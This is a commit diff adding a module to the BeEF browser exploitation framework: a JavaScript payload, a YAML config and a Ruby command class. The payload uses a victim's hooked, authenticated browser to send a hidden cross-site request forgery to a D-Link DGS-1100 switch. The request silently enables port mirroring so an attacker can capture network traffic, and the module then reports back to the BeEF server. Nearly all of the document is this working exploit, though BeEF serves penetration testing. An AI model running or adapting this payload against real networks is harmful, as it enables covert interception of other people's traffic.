Adding DLink DGS 1100 Port Mirroring module
This commit is contained in:
@@ -0,0 +1,61 @@
|
||||
//
|
||||
// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
// Hooked browser must be authenticated to switch.
|
||||
var base = '<%= @base %>';
|
||||
var totalports = parseInt('<%= @totalports %>');
|
||||
var mirrorport = parseInt('<%= @mirrorport %>');
|
||||
|
||||
var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
|
||||
|
||||
var form = document.createElement('form');
|
||||
form.setAttribute('action', base + "/cgi/PortMirroring.cgi");
|
||||
form.setAttribute('method', 'POST');
|
||||
|
||||
var input = null;
|
||||
|
||||
input = document.createElement('input');
|
||||
input.setAttribute('type', 'hidden');
|
||||
input.setAttribute('name', 'cEn');
|
||||
input.setAttribute('value', 1);
|
||||
form.appendChild(input);
|
||||
|
||||
input = document.createElement('input');
|
||||
input.setAttribute('type', 'hidden');
|
||||
input.setAttribute('name', 'sTagP');
|
||||
input.setAttribute('value', mirrorport);
|
||||
form.appendChild(input);
|
||||
|
||||
input = document.createElement('input');
|
||||
input.setAttribute('type', 'hidden');
|
||||
input.setAttribute('name', 'sMode');
|
||||
input.setAttribute('value', 2);
|
||||
form.appendChild(input);
|
||||
|
||||
var mask = '';
|
||||
for (var i = 1; i <= totalports; i++) {
|
||||
mask += i == mirrorport ? "0" : "1";
|
||||
}
|
||||
|
||||
input = document.createElement('input');
|
||||
input.setAttribute('type', 'hidden');
|
||||
input.setAttribute('name', 'SrcLst');
|
||||
input.setAttribute('value', mask);
|
||||
form.appendChild(input);
|
||||
|
||||
dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
|
||||
form.submit();
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(dlink_dgs_iframe);
|
||||
}
|
||||
|
||||
setTimeout("cleanup()", 15000);
|
||||
});
|
||||
|
||||
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
Dlink_dgs_1100_port_mirroring_csrf:
|
||||
enable: true
|
||||
category: ["Exploits", "Switch"]
|
||||
name: "DLINK DGS 1100-08 Port Mirroring CSRF"
|
||||
description: "Enables port mirroring on a specified switch port"
|
||||
authors: ["Nick Starke"]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
@@ -0,0 +1,20 @@
|
||||
#
|
||||
# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Dlink_dgs_1100_port_mirroring_csrf < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://10.90.90.90'},
|
||||
{'name' => 'mirrorport', 'ui_label' => 'Switch port to mirror traffic on', 'value' => 1},
|
||||
{'name' => 'totalports', 'ui_label' => 'Total number of ports on switch', 'value' => 8}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
|
||||
end
|
||||
Reference in New Issue
Block a user